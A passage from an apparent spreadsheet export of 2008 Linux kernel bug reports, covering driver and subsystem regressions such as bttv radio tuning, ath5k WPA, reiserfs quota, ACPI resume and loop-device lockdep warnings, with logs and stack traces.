exit. (fs/exec.c:flush_old_exec -&gt; kernel/signal.c:flush_signal_handlers) 6. The kernel finishes loading the new process image. 7. The pending timer signal queued in step 3 gets delivered to the unsuspecting exec'd process. One possible solution would be to remove pending timer-generated signals after deleting the timers. These signals are marked with an si_code of SI_TIMER, so they should be easy to identify. Unfortunately, simply disabling timers earlier probably isn't sufficient to completely eliminate the race condition, unless it can be guaranteed that timer signals will be disabled between the entry to the system call and the point where the timers are deleted.</t>
  </si>
  <si>
    <t>FM tuner doesn't change frequency</t>
  </si>
  <si>
    <t>2008-04-16 23:03 UTC</t>
  </si>
  <si>
    <t>Enrico Tröger</t>
  </si>
  <si>
    <t>2008-04-23 10:28 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.x Earliest failing kernel version: 2.6.24 Distribution: Debian Testing Hardware Environment: Typhoon TView RDS + FM Stereo / KNC1 TV Station RDS (card=53, tuner=20) Software Environment: radio(from xawtv), rico_RADIO Problem Description: Since kernel 2.6.24 I can't change the frequency of my TV card radio tuner. TV itself is working fine with xawtv and tvtime. But the radio tuner is broken, I tried it with the "radio" tool from xawtv and with "rico_RADIO". The apps start as usual but the first time after a reboot there is only noise. Once I started a TV application which tunes in a station and I quit it, the afterwards started radio app plays the sound of the last tuned TV station. The radio apps let me change the frequency, i.e. I can change it in the app itself but the sound signal from the TV card doesn't change. bttv related dmesg output: Linux video capture interface: v2.00 ACPI: Power Button (FF) [PWRF] input: Power Button (CM) as /devices/LNXSYSTM:00/device:00/PNP0C0C:00/input/input4 ACPI: Power Button (CM) [PWRB] bttv: driver version 0.9.17 loaded bttv: using 8 buffers with 2080k (520 pages) each for capture bttv: Bt8xx card found (0). ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 19 ACPI: PCI Interrupt 0000:01:08.0[A] -&gt; Link [LNKA] -&gt; GSI 19 (level, low) -&gt; IRQ 19 bttv0: Bt878 (rev 17) at 0000:01:08.0, irq: 19, latency: 32, mmio: 0xd9fff000 bttv0: using: Typhoon TView RDS + FM Stereo / KNC1 TV Station RDS [card=53,insmod option] bttv0: gpio: en=00000000, out=00000000 in=00ffffff [init] bttv0: tuner type=20 bttv0: i2c: checking for MSP34xx @ 0x80... not found bttv0: i2c: checking for TDA9875 @ 0xb0... not found bttv0: i2c: checking for TDA7432 @ 0x8a... not found tvaudio' 2-005b: tda9873h found @ 0xb6 (bt878 #0 [sw]) TEA5761 detected. tuner' 2-0010: chip found @ 0x20 (bt878 #0 [sw]) TEA5761 detected. tea5761 2-0010: type set to Philips TEA5761HN FM Radio All bytes are equal. It is not a TEA5767 tuner' 2-0060: chip found @ 0xc0 (bt878 #0 [sw]) tuner-simple 2-0060: type set to 20 (Temic PAL_BG (4009 FR5) or PAL_I (4069 FR5)) bttv0: registered device video0 bttv0: registered device vbi0 bttv0: registered device radio0 bttv0: PLL: 28636363 =&gt; 35468950 .. ok Multimedia part of my kernel config: # Multimedia devices # CONFIG_VIDEO_DEV=m CONFIG_VIDEO_V4L2_COMMON=m CONFIG_VIDEO_V4L1=y CONFIG_VIDEO_V4L1_COMPAT=y CONFIG_VIDEO_V4L2=y CONFIG_VIDEO_CAPTURE_DRIVERS=y # CONFIG_VIDEO_ADV_DEBUG is not set CONFIG_VIDEO_HELPER_CHIPS_AUTO=y CONFIG_VIDEO_TVAUDIO=m CONFIG_VIDEO_TDA7432=m CONFIG_VIDEO_TDA9875=m CONFIG_VIDEO_MSP3400=m # CONFIG_VIDEO_VIVI is not set CONFIG_VIDEO_BT848=m CONFIG_VIDEO_SAA6588=m # CONFIG_VIDEO_CPIA is not set # CONFIG_VIDEO_CPIA2 is not set # CONFIG_VIDEO_SAA5246A is not set # CONFIG_VIDEO_SAA5249 is not set # CONFIG_TUNER_3036 is not set # CONFIG_VIDEO_STRADIS is not set # CONFIG_VIDEO_ZORAN is not set # CONFIG_VIDEO_SAA7134 is not set # CONFIG_VIDEO_MXB is not set # CONFIG_VIDEO_DPC is not set # CONFIG_VIDEO_HEXIUM_ORION is not set # CONFIG_VIDEO_HEXIUM_GEMINI is not set # CONFIG_VIDEO_CX88 is not set # CONFIG_VIDEO_IVTV is not set # CONFIG_VIDEO_CAFE_CCIC is not set # CONFIG_V4L_USB_DRIVERS is not set # CONFIG_RADIO_ADAPTERS is not set # CONFIG_DVB_CORE is not set CONFIG_VIDEO_TUNER=m # CONFIG_VIDEO_TUNER_CUSTOMIZE is not set CONFIG_TUNER_XC2028=m CONFIG_TUNER_MT20XX=m CONFIG_TUNER_TDA8290=m CONFIG_TUNER_TEA5761=m CONFIG_TUNER_TEA5767=m CONFIG_TUNER_SIMPLE=m CONFIG_TUNER_TDA9887=m CONFIG_VIDEOBUF_GEN=m CONFIG_VIDEOBUF_DMA_SG=m CONFIG_VIDEO_BTCX=m CONFIG_VIDEO_IR_I2C=m CONFIG_VIDEO_IR=m CONFIG_VIDEO_TVEEPROM=m Related loaded modules: tuner 42676 0 tea5767 7620 1 tuner tda8290 14788 1 tuner tuner_xc2028 21712 1 tuner tda9887 11012 1 tuner tuner_simple 9992 1 tuner mt20xx 13896 1 tuner tea5761 6148 1 tuner tvaudio 27800 0 bttv 208852 0 ir_common 41284 1 bttv compat_ioctl32 10368 1 bttv videodev 36672 3 tuner,bttv,compat_ioctl32 v4l1_compat 14660 1 videodev i2c_algo_bit 7556 1 bttv v4l2_common 13632 3 tuner,tvaudio,bttv videobuf_dma_sg 15940 1 bttv videobuf_core 21828 2 bttv,videobuf_dma_sg btcx_risc 5960 1 bttv tveeprom 19856 1 bttv</t>
  </si>
  <si>
    <t>WPA-PSK doesn't work with ath5k in 2.6.25 kernel</t>
  </si>
  <si>
    <t>2008-04-17 01:52 UTC</t>
  </si>
  <si>
    <t>2008-09-30 06:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian testing Hardware Environment: Atheros Communications Inc. AR5413 802.11abg NIC (rev 01) Software Environment: Debian testing Problem Description: notas:/home/cijoml# /sbin/wpa_supplicant -i ath0 -D wext -c /etc/wpa_supplicant/wpa_supplicant.conf ioctl[SIOCSIWAUTH]: Operation not supported WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable Trying to associate with 00:17:9a:d7:c3:fc (SSID='CIJOML-2' freq=2437 MHz) Authentication with 00:00:00:00:00:00 timed out. ^CCTRL-EVENT-TERMINATING - signal 2 received ioctl[SIOCSIWAUTH]: Operation not supported WEXT auth param 4 value 0x0 - notas:/home/cijoml# Steps to reproduce: Start wpa_supplicant</t>
  </si>
  <si>
    <t>hid-core.c: ctrl urb status -75 received (hid_find_max_report)</t>
  </si>
  <si>
    <t>2008-04-17 05:43 UTC</t>
  </si>
  <si>
    <t>aa</t>
  </si>
  <si>
    <t>2008-10-17 06:03 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian Etch Hardware Environment: Software Environment: Problem Description: Sorry for bad english. When plug our hid device: &gt;dmesg hid-core.c: ctrl urb status -75 received &gt;modprobe usbmon &gt;cat ... c9c73540 3677199411 S Ci:027:00 s a1 01 030e 0001 0040 64 &lt; ;ok! c9c73540 3677200390 C Ci:027:00 0 64 = 0e000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 c9c73540 3677200400 S Ci:027:00 s a1 01 030f 0001 0080 128 &lt; ;ok! c9c73540 3677201388 C Ci:027:00 0 128 = 0f000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 c9c73540 3677201403 S Ci:027:00 s a1 01 0310 0001 0204 515 &lt; ; !!!BUG (0x204=516), 516&gt;515, need 516!!! (GetFeatureReport) c9c73540 3677203411 C Ci:027:00 -75 515 = 10000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 c9c73540 3677203443 S Ci:027:00 s a1 01 0311 0001 0040 64 &lt; c9c73540 3677204392 C Ci:027:00 0 64 = 11000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 c9c73540 3677204413 S Ci:027:00 s a1 01 0312 0001 0080 128 &lt; ;ok! c9c73540 3677205401 C Ci:027:00 0 128 = 12000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 c9c73540 3677205422 S Ci:027:00 s a1 01 0313 0001 0204 515 &lt; ;!!! Same BUG c9c73540 3677207419 C Ci:027:00 -75 515 = 13000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 c9c73540 3677207461 S Ci:027:00 s a1 01 0314 0001 0040 64 &lt; c9c73540 3677208399 C Ci:027:00 0 64 = 14457461 20667566 656c2070 7265646e 617a6e61 34656e61 2032204c 696e7578 May be bug here: hid-core.c static void hid_find_max_report(struct hid_device *hid, unsigned int type, int *max) { struct hid_report *report; int size; list_for_each_entry(report, &amp;hid-&gt;report_enum[type].report_list, list) { size = ((report-&gt;size - 1) &gt;&gt; 3) + 1; ///////// NEED size = ((report-&gt;size - 1) &gt;&gt; 3) + 1 + (report-&gt;id &gt; 0); if (type == HID_INPUT_REPORT &amp;&amp; hid-&gt;report_enum[type].numbered) size++; // previous string may be need comment or write: type == HID_INPUT_REPORT || type==HID_FEATURE_REPORT (unknow for HID_OUTPUT_REPORT) if (*max &lt; size) *max = size; } } Steps to reproduce:</t>
  </si>
  <si>
    <t>Missing compat layer for PTRACE_(GET|SET)SIGINFO</t>
  </si>
  <si>
    <t>2008-04-17 06:20 UTC</t>
  </si>
  <si>
    <t>2012-05-21 16:24 UTC</t>
  </si>
  <si>
    <t>Since struct siginfo contains pointers and other values with potentially different sizes between 32-bit and 64-bit it needs to be properly converted for PTRACE_(GET|SET)SIGINFO. GDB relies on it for proper hw watchpoint handling. Observed on ppc64 when debugging a 32-bit program, but other architectures likely have the same problem.</t>
  </si>
  <si>
    <t>x86: defconfig not being applied automatically since 2.6.24</t>
  </si>
  <si>
    <t>2008-04-17 10:53 UTC</t>
  </si>
  <si>
    <t>2008-04-29 03:55 UTC</t>
  </si>
  <si>
    <t>In 2.6.23, if you unpacked a kernel source tarball and then ran "make menuconfig" you'd be presented with this message: # using defaults found in arch/i386/defconfig and the default options would be set. The same thing in 2.6.24 does not give you any "using defaults" message, and the default config options within menuconfig are rather blank (e.g. no PCI support). You can work around this by explicitly running "make defconfig" before menuconfig, but it would be nice to have the behaviour the way it was for 2.6.23 (and the way it still is for other archs). I've looked into the problem. It works on 2.6.23 because of init/Kconfig which is still unchanged: config DEFCONFIG_LIST [...] default "arch/$ARCH/defconfig" arch/i386/defconfig and arch/x86_64/defconfig existed in 2.6.23, but not in 2.6.24 due to the arch merge. I'm not really sure of the right way to fix it for the newer kernels. I tried adding another default in DEFCONFIG_LIST: default "arch/$SRCARCH/configs/$KBUILD_DEFCONFIG" but it seems that $SRCARCH and $KBUILD_DEFCONFIG are not being exported to kconfig and I couldn't immediately see how to change that. Plus I'm not sure that this is the right approach.</t>
  </si>
  <si>
    <t>Infinite loop "b44: eth0: powering down PHY"</t>
  </si>
  <si>
    <t>2008-04-17 17:08 UTC</t>
  </si>
  <si>
    <t>Nelson A. de Oliveira</t>
  </si>
  <si>
    <t>2009-03-23 09:28 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.4 (from Debian) Earliest failing kernel version: 2.6.25 (vanilla) Distribution: Debian Problem Description: While booting the new 2.6.25 Kernel, it enters an infinite looping displaying "b44: eth0: powering down PHY". The system isn't freezed as magick SysRq keys works, but it just stay displaying those messages. I am unable to dump any information using SysRq, however (as the b44(...) messages are too fast). I will attach lspci output and my .config</t>
  </si>
  <si>
    <t>commit acc1f3ede977bf189b332874beeadf48c01544c5 prevents reiserfs to correctly enable quota support</t>
  </si>
  <si>
    <t>2008-04-18 03:17 UTC</t>
  </si>
  <si>
    <t>Fabian Urhausen</t>
  </si>
  <si>
    <t>2008-12-01 10:02 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.4 Earliest failing kernel version: 2.6.25 Distribution: Debian Etch 4.0rc3 Hardware Environment: Software Environment: Problem Description: The change from commit acc1f3ede977bf189b332874beeadf48c01544c5 prevents reiserfs to correctly initialize quota support. Even if notail Option is set reiserfs incorrectly reports: ReiserFS: md1: warning: reiserfs: Quota file must have tail packing disabled. Actual it's impossible to have reiserfs running with quota support. Rechanging things from if (!(REISERFS_I(nd.path.dentry-&gt;d_inode)-&gt;i_flags &amp; i_nopack_mask)) { to if (!REISERFS_I(nd.path.dentry-&gt;d_inode)-&gt;i_flags &amp; i_nopack_mask) { in super.c fixes things. For details look at mentioned commit number. So please revert this commit because it's not a bug and just breaks quota support for reiserfs. Steps to reproduce: See above</t>
  </si>
  <si>
    <t>[2.6.25 REGRESSION] Lenovo 3000 N100 does not wake up from ACPI S3 state</t>
  </si>
  <si>
    <t>2008-04-19 05:48 UTC</t>
  </si>
  <si>
    <t>2008-10-17 14:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-rc8-git8 Earliest failing kernel version: 2.6.25-rc8-git9 Distribution: Arch Linux Hardware Environment: Lenovo 3000 N100, Core 2 Duo T5300 Problem Description: Since 2.6.25-rc9, my Lenovo 3000 N100 (Core 2 Duo T5300), running x86_64 does not wake up from ACPI S3 (Suspend to RAM) any more. The display remains dark. It's possible that this bug also occurs on i686, I currently have no way of testing that though. Fix: Revert http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=783e391b7b5b273cd20856d8f6f4878da8ec31b3</t>
  </si>
  <si>
    <t>Boot Oops+hang in 2.6.25-rc and 2.6.25-final kernels</t>
  </si>
  <si>
    <t>2008-04-19 06:51 UTC</t>
  </si>
  <si>
    <t>2008-09-23 04:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-rc5.mm1 has been confirmed to work fine Earliest failing kernel version: N/A unfortunately. I don't reboot often enough to notice it Distribution: Fedora Devel Hardware Environment: CK804 + AMD X2 Software Environment: early udev boot Problem Description: See attached picture. As the kernel scrolls very fast at this point it took me weeks to get a correct screen capture Steps to reproduce: Boot. Will almost always result in hang. shift+page-up repeatedly at boot time reduces hang probability See also https://bugzilla.redhat.com/show_bug.cgi?id=441765</t>
  </si>
  <si>
    <t>kernel 2.6.24  4G FC arrays don't work properly with qla2xxx driver</t>
  </si>
  <si>
    <t>QLOGIC QLA2XXX</t>
  </si>
  <si>
    <t>2.6.24+</t>
  </si>
  <si>
    <t>2008-04-19 14:46 UTC</t>
  </si>
  <si>
    <t>Andrej Filipcic</t>
  </si>
  <si>
    <t>2008-04-29 14:12 UTC</t>
  </si>
  <si>
    <t>scsi_drivers-qla2xxx</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23 Earliest failing kernel version: 2.6.24 Distribution: gentoo Hardware Environment: opteron Software Environment: x86_64 Problem Description: With 2.6.24 and 25 there are troubles with qla2xxx module. 4G FC arrays (Infortrend) are not working properly, while 2G FC are OK. Detecting 4G array gives: sd 8:0:0:0: [sdc] Very big device. Trying to use READ CAPACITY(16). sd 8:0:0:0: [sdc] 44918798336 512-byte hardware sectors (22998425 MB) sd 8:0:0:0: [sdc] Write Protect is off sd 8:0:0:0: [sdc] Mode Sense: 8f 00 00 08 sd 8:0:0:0: [sdc] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sd 8:0:0:0: [sdc] Very big device. Trying to use READ CAPACITY(16). sd 8:0:0:0: [sdc] 44918798336 512-byte hardware sectors (22998425 MB) sd 8:0:0:0: [sdc] Write Protect is off sd 8:0:0:0: [sdc] Mode Sense: 8f 00 00 08 sd 8:0:0:0: [sdc] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sdc: sdc1 sd 8:0:0:0: [sdc] Attached SCSI disk and later on, generated by vgscan: sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 0 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 44918798208 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 44918798320 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 0 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 8 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 0 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 44918798114 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 44918798282 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 34 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 42 sd 8:0:0:0: [sdc] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK end_request: I/O error, dev sdc, sector 34 2.6.23 (gentoo-sources) works fine. I am not sure whether this is a regression in the driver or something else. The controller is QLogic QLE220 - PCI-Express to 4Gb FC, Single Channel ISP5432: PCIe (2.5Gb/s x4) and firmware version is 4.02.02 (from sys-block/qla-fc-firmware-20071207) On qlogic site there is a newer firmware (4.03.02), although I doubt the firmware would be the cause of the problems. To be honest, I have not checked 2.6.25 release but rather rc8, however there are no qla2xxx related patches since then. Steps to reproduce: boot 2.6.24 or 25, run vgscan</t>
  </si>
  <si>
    <t>mips BCM47XX compile error</t>
  </si>
  <si>
    <t>2.6.25-git</t>
  </si>
  <si>
    <t>2008-04-20 17:07 UTC</t>
  </si>
  <si>
    <t>2009-03-23 09:34 UTC</t>
  </si>
  <si>
    <t>Subject : mips BCM47XX compile error Submitter : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; References : http://lkml.org/lkml/2008/4/20/34 Caused-By : Michael Buesch &lt;mb@bu3sch.de&gt; commit aab547ce0d1493d400b6468c521a0137cd8c1edf</t>
  </si>
  <si>
    <t>Voyager setup_trampoline() compile error</t>
  </si>
  <si>
    <t>2008-04-20 17:12 UTC</t>
  </si>
  <si>
    <t>2008-05-08 02:56 UTC</t>
  </si>
  <si>
    <t>Subject : Voyager setup_trampoline() compile error Submitter : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; References : http://lkml.org/lkml/2008/4/20/258 Caused-By : Ingo Molnar &lt;mingo@elte.hu&gt; commit 77ad386e596c6b0930cc2e09e3cce485e3ee7f72</t>
  </si>
  <si>
    <t>Voyager phys_cpu_present_map compile error</t>
  </si>
  <si>
    <t>2008-05-14 15:42 UTC</t>
  </si>
  <si>
    <t>Subject : Voyager phys_cpu_present_map compile error Submitter : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; References : http://lkml.org/lkml/2008/4/20/259 Caused-By : Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; commit 2fe60147570231cde0d1f14711d2e34ccdf54b65</t>
  </si>
  <si>
    <t>walken</t>
  </si>
  <si>
    <t>losetup possible circular locking</t>
  </si>
  <si>
    <t>2008-04-22 06:27 UTC</t>
  </si>
  <si>
    <t>2012-05-12 16:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: Distribution: fedora Hardware Environment: Software Environment: Problem Description: INFO trace appears in the log - but no other problems visible Steps to reproduce: losetup /dev/loop0 file losetup -o 32256 /dev/loop1 /dev/loop0 losetup -d /dev/loop1 losetup -d /dev/loop0 -------------------- EXT3 FS on loop1, internal journal EXT3-fs: mounted filesystem with ordered data mode. ======================================================= [ INFO: possible circular locking dependency detected ] 2.6.25 #57 ------------------------------------------------------- losetup/9902 is trying to acquire lock: (&amp;bdev-&gt;bd_mutex){--..}, at: [&lt;ffffffff810e8db8&gt;] __blkdev_put+0x38/0x1e0 but task is already holding lock: (&amp;lo-&gt;lo_ctl_mutex){--..}, at: [&lt;ffffffffa03e499e&gt;] lo_ioctl+0x4e/0xb40 [loop] which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #1 (&amp;lo-&gt;lo_ctl_mutex){--..}: [&lt;ffffffff81066249&gt;] __lock_acquire+0x1149/0x11d0 [&lt;ffffffff81066366&gt;] lock_acquire+0x96/0xe0 [&lt;ffffffff812ebfd0&gt;] mutex_lock_nested+0xc0/0x330 [&lt;ffffffffa03e3384&gt;] lo_open+0x34/0x50 [loop] [&lt;ffffffff810e9329&gt;] do_open+0xa9/0x350 [&lt;ffffffff810e960d&gt;] blkdev_open+0x3d/0x90 [&lt;ffffffff810b7f94&gt;] __dentry_open+0x114/0x390 [&lt;ffffffff810b82f4&gt;] nameidata_to_filp+0x44/0x60 [&lt;ffffffff810c76ab&gt;] do_filp_open+0x1fb/0xa40 [&lt;ffffffff810b7d96&gt;] do_sys_open+0x76/0x100 [&lt;ffffffff810b7e4b&gt;] sys_open+0x1b/0x20 [&lt;ffffffff8100c5db&gt;] system_call_after_swapgs+0x7b/0x80 [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff -&gt; #0 (&amp;bdev-&gt;bd_mutex){--..}: [&lt;ffffffff810660e5&gt;] __lock_acquire+0xfe5/0x11d0 [&lt;ffffffff81066366&gt;] lock_acquire+0x96/0xe0 [&lt;ffffffff812ebfd0&gt;] mutex_lock_nested+0xc0/0x330 [&lt;ffffffff810e8db8&gt;] __blkdev_put+0x38/0x1e0 [&lt;ffffffff810e8f6b&gt;] blkdev_put+0xb/0x10 [&lt;ffffffff810e8f98&gt;] blkdev_close+0x28/0x40 [&lt;ffffffff810bb3c5&gt;] __fput+0xc5/0x1f0 [&lt;ffffffff810bb50d&gt;] fput+0x1d/0x30 [&lt;ffffffffa03e491d&gt;] loop_clr_fd+0x1ad/0x1e0 [loop] [&lt;ffffffffa03e4acf&gt;] lo_ioctl+0x17f/0xb40 [loop] [&lt;ffffffff8116b36d&gt;] blkdev_driver_ioctl+0x8d/0xa0 [&lt;ffffffff8116b5fd&gt;] blkdev_ioctl+0x27d/0x7e0 [&lt;ffffffff810e86db&gt;] block_ioctl+0x1b/0x20 [&lt;ffffffff810c8ea1&gt;] vfs_ioctl+0x31/0xa0 [&lt;ffffffff810c9193&gt;] do_vfs_ioctl+0x283/0x2f0 [&lt;ffffffff810c9299&gt;] sys_ioctl+0x99/0xa0 [&lt;ffffffff8100c5db&gt;] system_call_after_swapgs+0x7b/0x80 [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff other info that might help us debug this: 1 lock held by losetup/9902: #0: (&amp;lo-&gt;lo_ctl_mutex){--..}, at: [&lt;ffffffffa03e499e&gt;] lo_ioctl+0x4e/0xb40 [loop] stack backtrace: Pid: 9902, comm: losetup Not tainted 2.6.25 #57 Call Trace: [&lt;ffffffff81064e44&gt;] print_circular_bug_tail+0x84/0x90 [&lt;ffffffff810660e5&gt;] __lock_acquire+0xfe5/0x11d0 [&lt;ffffffff81064e90&gt;] ? check_usage+0x40/0x2b0 [&lt;ffffffff810e8db8&gt;] ? __blkdev_put+0x38/0x1e0 [&lt;ffffffff81066366&gt;] lock_acquire+0x96/0xe0 [&lt;ffffffff810e8db8&gt;] ? __blkdev_put+0x38/0x1e0 [&lt;ffffffff812ebfd0&gt;] mutex_lock_nested+0xc0/0x330 [&lt;ffffffff810e8db8&gt;] ? __blkdev_put+0x38/0x1e0 [&lt;ffffffff810e8db8&gt;] __blkdev_put+0x38/0x1e0 [&lt;ffffffff810e8f6b&gt;] blkdev_put+0xb/0x10 [&lt;ffffffff810e8f98&gt;] blkdev_close+0x28/0x40 [&lt;ffffffff810bb3c5&gt;] __fput+0xc5/0x1f0 [&lt;ffffffff810bb50d&gt;] fput+0x1d/0x30 [&lt;ffffffffa03e491d&gt;] :loop:loop_clr_fd+0x1ad/0x1e0 [&lt;ffffffffa03e4acf&gt;] :loop:lo_ioctl+0x17f/0xb40 [&lt;ffffffff81013458&gt;] ? native_sched_clock+0x78/0x80 [&lt;ffffffff81065464&gt;] ? __lock_acquire+0x364/0x11d0 [&lt;ffffffff81013458&gt;] ? native_sched_clock+0x78/0x80 [&lt;ffffffff81013458&gt;] ? native_sched_clock+0x78/0x80 [&lt;ffffffff81065464&gt;] ? __lock_acquire+0x364/0x11d0 [&lt;ffffffff81013458&gt;] ? native_sched_clock+0x78/0x80 [&lt;ffffffff81065464&gt;] ? __lock_acquire+0x364/0x11d0 [&lt;ffffffff81062afa&gt;] ? get_lock_stats+0x2a/0x70 [&lt;ffffffff81062b4e&gt;] ? put_lock_stats+0xe/0x30 [&lt;ffffffff8105a3e3&gt;] ? down+0x33/0x50 [&lt;ffffffff812ee295&gt;] ? _spin_unlock_irqrestore+0x65/0x90 [&lt;ffffffff810649e1&gt;] ? trace_hardirqs_on+0x131/0x190 [&lt;ffffffff812ee275&gt;] ? _spin_unlock_irqrestore+0x45/0x90 [&lt;ffffffff8105a3e3&gt;] ? down+0x33/0x50 [&lt;ffffffff8116b36d&gt;] blkdev_driver_ioctl+0x8d/0xa0 [&lt;ffffffff8116b5fd&gt;] blkdev_ioctl+0x27d/0x7e0 [&lt;ffffffff81013458&gt;] ? native_sched_clock+0x78/0x80 [&lt;ffffffff81065464&gt;] ? __lock_acquire+0x364/0x11d0 [&lt;ffffffff810c4a21&gt;] ? putname+0x31/0x50 [&lt;ffffffff810b39f5&gt;] ? check_object+0x265/0x270 [&lt;ffffffff810b3230&gt;] ? init_object+0x50/0x90 [&lt;ffffffff810e86db&gt;] block_ioctl+0x1b/0x20 [&lt;ffffffff810c8ea1&gt;] vfs_ioctl+0x31/0xa0 [&lt;ffffffff810c9193&gt;] do_vfs_ioctl+0x283/0x2f0 [&lt;ffffffff812edbd9&gt;] ? trace_hardirqs_on_thunk+0x35/0x3a [&lt;ffffffff810c9299&gt;] sys_ioctl+0x99/0xa0 [&lt;ffffffff8100c5db&gt;] system_call_after_swapgs+0x7b/0x80</t>
  </si>
  <si>
    <t>Kernel fails to properly identify SATA drives</t>
  </si>
  <si>
    <t>kernels from 2.6.24 to 2.6.25</t>
  </si>
  <si>
    <t>2008-04-22 18:38 UTC</t>
  </si>
  <si>
    <t>Melcar</t>
  </si>
  <si>
    <t>2008-05-23 14:30 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22.9 and 2.6.23.17 Earliest failing kernel version: 2.6.24 Distribution: Ubuntu x86_64 Hardware Environment: Asus M2R32-MVP 580X SB600 (AM2) AMD X2 4000+ 4GB DDR2 SATAII HDD SATA DVD R/W Software Environment: Ubuntu Gutsy w/ distribution kernel (2.6.22-14) Problem Description: All 2.6.24 and 2.6.25 kernels fail to boot properly, with the following error looping indefinitely: ata1.00: failed to IDENTIFY (I/O error, err_mask=0x4) ata2.00: failed to IDENTIFY (I/O error, err_mask=0x4) The above correspond to my two SATA physical drives. All 2.6.22 and 2.6.23 kernels work perfectly on this same machine. Was there some type of change starting with the 2.6.24 kernels that is rendering my PC inoperable? I have tried looking for similar reports on this, and so far I have only found one entry on the mailing list that deals with the same issue. The problem was apparently solved by a BIOS flash to the latest revision, which I'm reluctant to do since the newest BIOS from ASUS has several bugs that renders my particular system unusable. Steps to reproduce: Using the 0906 BIOS revision for the M2R32-MVP motherboard and SATA drives.</t>
  </si>
  <si>
    <t>AC Adapter Events on Sony VAIO VGN-FZ31M</t>
  </si>
  <si>
    <t>2008-04-23 13:06 UTC</t>
  </si>
  <si>
    <t>fatgerman</t>
  </si>
  <si>
    <t>2008-10-27 19:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: None Earliest failing kernel version: tested 2.6.24.4 Mandriva Kernel and 2.6.25 from kernel.org Distribution: Mandriva Hardware Environment: Sony VAIO VGN-FZ31M Software Environment: Linux/KDE Problem Description: No AC adapter events are reported by the kernel, meaning I can't change to 'powersvae' mode automatically when I unplug the AC adapter. Other ACPI events (lid close, power button, battery level) are working correctly. I have sony-latop and sonypi in use (I need the former to get ACPI to work, and the latter for things like display brightness, bluetooth, etc). I was asked to report this here by the linux-ACPI mailing list. Steps to reproduce: Unplug the power adapter. Without acpid running I can cat /proc/acpi/event and I get the following: &lt;unplug power&gt; battery BAT0 00000080 00000001 processor CPU0 00000081 00000000 processor CPU1 00000081 00000000 &lt;plug power&gt; battery BAT0 00000080 00000001 processor CPU0 00000081 00000000 processor CPU1 00000081 00000000 So no AC adapter events. I will attach output from dmesg | grep ACPI, acpidump, and the decomplied DSDT.</t>
  </si>
  <si>
    <t>isofs crashes with corrupted image</t>
  </si>
  <si>
    <t>2.6.25-03562-g3dc5063</t>
  </si>
  <si>
    <t>2008-04-24 05:52 UTC</t>
  </si>
  <si>
    <t>2008-04-28 06:05 UTC</t>
  </si>
  <si>
